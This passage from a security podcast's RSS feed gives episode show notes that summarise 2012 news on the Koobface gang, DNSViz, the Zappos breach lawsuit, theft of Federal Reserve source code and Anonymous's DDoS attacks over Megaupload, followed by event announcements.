<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.nytimes.com/2012/01/17/technology/koobface-gang-uses-facebook-to-spread-powerful-worm.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.nytimes.com/2012/01/17/technology/koobface-gang-uses-facebook-to-spread-powerful-worm.html</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Five men believed to be responsible for spreading a notorious computer worm on Facebook and other social networks &mdash; and pocketing several million dollars from online schemes &mdash; are hiding in plain sight in St. Petersburg, Russia, according to investigators at Facebook and several independent computer security researchers.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A member of the Koobface gang posted to Foursquare, showing an office, complete with coordinates, in St. Petersburg.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The men live comfortable lives in St. Petersburg &mdash; and have frolicked on luxury vacations in places like Monte Carlo, Bali and, earlier this month, Turkey, according to photographs posted on social network sites &mdash; even though their identities have been known for years to Facebook, computer security investigators and law enforcement officials.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One member of the group, which is popularly known as the Koobface gang, has regularly broadcast the coordinates of its offices by checking in on Foursquare, a location-based social network, and posting the news to Twitter. Photographs on Foursquare also show other suspected members of the group working on Macs in a loftlike room that looks like offices used by tech start-ups in cities around the world.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://share.sandia.gov/news/resources/news_releases/dnsviz/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://share.sandia.gov/news/resources/news_releases/dnsviz/</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sandia National Laboratories computer scientist Casey Deccio has developed a visualization tool known as DNSViz to help network administrators within the federal government and global IT community better understand Domain Name System Security (DNSSEC) and to help them troubleshoot problems. (Click</span><a href="http://youtu.be/GDz4Riwfg-0"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">here</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to see a short video of Deccio discussing the DNSViz tool.)</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DNSSEC is a security feature mandated for all federal information systems by the White House&rsquo;s Office of Management and Budget (OMB). The 2008 mandate requires that &ldquo;the top level .gov domain will be DNSSEC-signed, and processes to enable secure delegated sub-domains will be developed.&rdquo;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The entity that serves to translate the hostname of a Uniform Resource Locator (URL) into an Internet Protocol (IP) address is known as the Domain Name System (DNS). A DNS &ldquo;lookup&rdquo; is a prerequisite for doing almost anything on the Internet, including Web browsing, emailing or videoconferencing.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Although the mandate made perfect sense, said Deccio, there soon emerged a problem when .gov organizations actually began deploying DNSSEC.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.komonews.com/news/business/Zappos-Amazon-sued-over-customer-data-breach--137620588.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.komonews.com/news/business/Zappos-Amazon-sued-over-customer-data-breach&#8211;137620588.html</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Officials representing Zappos in Nevada and parent company Amazon in Seattle declined comment Wednesday on the lawsuit filed in U.S. District Court in Louisville, Ky.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The lawsuit was filed Monday, after Zappos chief executive Tony Hsieh alerted employees and customers by email Sunday that names, phone numbers and email addresses of the shoe retailer&#39;s customer may have been accessed in a hacker attack. The company said customers&#39; credit card and payment information weren&#39;t stolen.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Zappos urged customers to reset passwords to Zappos.com accounts and any other websites where they use similar passwords.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Zappos said the hacker gained access to its internal network and systems through one of the company&#39;s servers in Kentucky. Zappos is based in Henderson, near Las Vegas. It is owned by Seattle-based Amazon.com Inc.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Geordy&rsquo;s comments:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Does anyone else feel like they got this lawsuit out in record time? &nbsp;Almost like they were waiting around for it to happen&#8230;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.theregister.co.uk/2012/01/19/feds_arrest_programmer_for_software_theft/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/01/19/feds_arrest_programmer_for_software_theft/</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A computer programmer has been charged with stealing source code worth $9.5m from the Federal Reserve Bank of New York, according to the FBI and prosecutors.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Bo Zhang, a 32-year-old from Queens in New York, was cuffed on suspicion of swiping the Government-wide Accounting and Reporting (GWA) software, used to help keep track of the US government&#39;s finances.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Among other things, the GWA handles ledger accounting for each appropriation, fund, and receipt within the Department of the Treasury, and provides federal agencies with an account statement &#8211; similar to bank statements provided to bank customers &#8211; of the agencies&rsquo; account balances with the United States Treasury,&quot; the US attorney&#39;s office for the Southern District of New York said in</span><a href="http://www.justice.gov/usao/nys/pressreleases/January12/zhangboarrestpr.pdf"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> an official statement</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Zhang was hired as a contractor to work on the code where it&#39;s held in an access-controlled electronic repository in New York. During last summer he allegedly stole the GWA code, which has so far cost the US $9.5m to develop.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;According to the complaint, Zhang admitted that in July 2011, while working at the Fed, he checked out and copied the GWA code onto his hard drive at the Fed; he subsequently copied the GWA code onto an Fed-owned external hard drive; and he connected that external hard-drive to his private office computer, his home computer, and his laptop,&quot; the US attorney&#39;s office added.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.pcmag.com/article2/0,2817,2399116,00.asp"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcmag.com/article2/0,2817,2399116,00.asp</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous was quick to target the Justice Department, Universal Music, the RIAA, and MPAA in the wake of this afternoon&#39;s Megaupload announcement, with the Web sites for all four organizations succumbing to distributed denial of service (DDoS) attacks.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Justice.gov and universalmusic.com went offline around 430pm Eastern and have been largely unresponsive for the past 1.5 hours. RIAA.com and MPAA.org are also unresponsive.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Recording Industry Association of America&mdash;Department of Justice&mdash;Universal Music&mdash;all TT, all TANGO DOWN,&quot; Anonymous tweeted this evening with the #OpMegaUpload hashtag.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Earlier today, the DOJ announced the shutdown of file-sharing site Megaupload. Seven individuals and two corporations were indicted for copyright infringement and could face up to 50 years in prison. Megaupload earned approximately $750 million for its exploits and incurred about $1 billion in damages, the agency alleged.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In its statement, the DOJ said the takedown was &quot;among the largest criminal copyright cases ever brought by the United States.&quot;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-572-carrier-iq-koobface-dnsviz-obligatory-lawsuit-source-code-swipe-doj-tango-down/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3395/0/infosec-daily-podcast-episode-572.mp3" length="18772572" type="audio/mpeg" />
		<itunes:duration>0:39:04</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 572 for January 19, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Adrian Crenshaw.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 572 for January 19, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Adrian Crenshaw.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates (New Update!)
	http://www.social-engineer.org/bradsmithdonation
	CampusCon 2012
	When: January 21, 2012
	Where: MOVED: CampusCon has been moved to the main WIT campus on Browne&#39;s Road
	http://campuscon.hackingwit.com
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Outerz0ne 8
	When: April 27-29, 2012
	Where: &#160;Atlanta, GA 
	http://www.outerz0ne.org/OZ8/
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://www.networkworld.com/[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 571 &#8211; Pentest Lessons, Apache/Tomcat Hash Attack, Muscovite, Bank Remote Access, Attacking the Exchanges &amp; Cost of Shutdown</title>
		<link>http://www.isdpodcast.com/episode-571-pentest-lessons-apachetomcat-hash-attack-muscovite-bank-remote-access-attacking-the-exchanges-cost-of-shutdown</link>
		<comments>http://www.isdpodcast.com/episode-571-pentest-lessons-apachetomcat-hash-attack-muscovite-bank-remote-access-attacking-the-exchanges-cost-of-shutdown#comments</comments>
		<pubDate>Thu, 19 Jan 2012 01:48:03 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3392</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 571 for January 18, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan &#38; Geordy Rostad. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 571 for January 18, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan &amp; Geordy Rostad.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
